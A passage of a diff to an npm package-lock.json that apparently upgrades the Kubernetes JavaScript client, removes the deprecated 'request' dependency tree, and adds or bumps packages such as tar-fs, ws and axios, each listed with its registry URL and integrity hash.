"sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "license": "BSD-2-Clause" }, - "node_modules/wrap-ansi-cjs/node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "license": "MIT", "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/wrap-ansi-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "license": "ISC" }, "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", + "license": "MIT", "engines": { "node": ">=10.0.0" }, @@ -1235,38 +696,9 @@ "optional": true } } - }, - "node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } } }, "dependencies": { - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, "@jsep-plugin/assignment": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", @@ -1280,28 +712,62 @@ "requires": {} }, "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "requires": { - "byline": "^5.0.0", + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", "openid-client": "^6.1.3", - "request": "^2.88.0", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true + "@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==" + }, + "@types/node": { + "version": "22.10.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", + "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", + "requires": { + "undici-types": "~6.20.0" + } + }, + "@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "requires": { + "@types/node": "*", + "form-data": "^4.0.0" + } + }, + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "requires": { + "@types/node": "*" + } + }, + "agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==" }, "ajv": { "version": "8.17.1", @@ -1328,119 +794,71 @@ "ajv": "^8.0.0" } }, - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, "argparse": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, "axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", + "integrity": "sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", "requires": { "follow-redirects": "^1.15.6", "form-data": "^4.0.0", "proxy-from-env": "^1.1.0" - }, - "dependencies": { - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - } - } } }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==" }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "requires": { - "tweetnacl": "^0.14.3" - } + "bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "optional": true }, - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "optional": true, "requires": { - "balanced-match": "^1.0.0" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" } }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "optional": true }, - "chownr": { + "bare-path": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "optional": true, "requires": { - "color-name": "~1.1.4" + "bare-os": "^3.0.1" } }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "optional": true, + "requires": { + "streamx": "^2.21.0" + } }, "combined-stream": { "version": "1.0.8", @@ -1450,27 +868,12 @@ "delayed-stream": "~1.0.0" } }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", + "debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", "requires": { - "assert-plus": "^1.0.0" + "ms": "^2.1.3" } }, "delayed-stream": { @@ -1478,44 +881,23 @@ "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "once": "^1.4.0" } }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" - }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" }, "fast-uri": { "version": "3.0.3", @@ -1527,123 +909,40 @@ "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "form-data": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.1.tgz", + "integrity": "sha512-tzN8e4TX8+kkxGPK8D5u0FNmjPUjw3lwC9lSLxxoB/+GtsJG91CO8bSWy73APlgAZzZbXEYZJuxjkHH2w+Ezhw==", "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "dependencies": { - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - } + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "mime-types": "^2.1.12" } }, - "http-signature": { + "hpagent": { "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" + }, + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" } }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, "isomorphic-ws": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", "requires": {} }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, "jose": { "version": "5.9.6", "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true + "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==" }, "js-yaml": { "version": "4.1.0", @@ -1654,34 +953,24 @@ } }, "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" }, "jsep": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, "json-schema-traverse": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "requires": { "@jsep-plugin/assignment": "^1.3.0", "@jsep-plugin/regex": "^1.0.4", @@ -1693,22 +982,6 @@ "resolved": "https://registry.npmjs.org/jsonpointer/-/jsonpointer-5.0.1.tgz", "integrity": "sha512-p/nXbhSEcu3pZRdkW1OfJhpsVtW1gd4Wa1fnQc9YLiTfAjn0312eMKimbdIQzuZl9aa9xUGaRlP9T/CJE/ditQ==" }, - "jsprim": { - "version": "1.4.2", - "resolved": 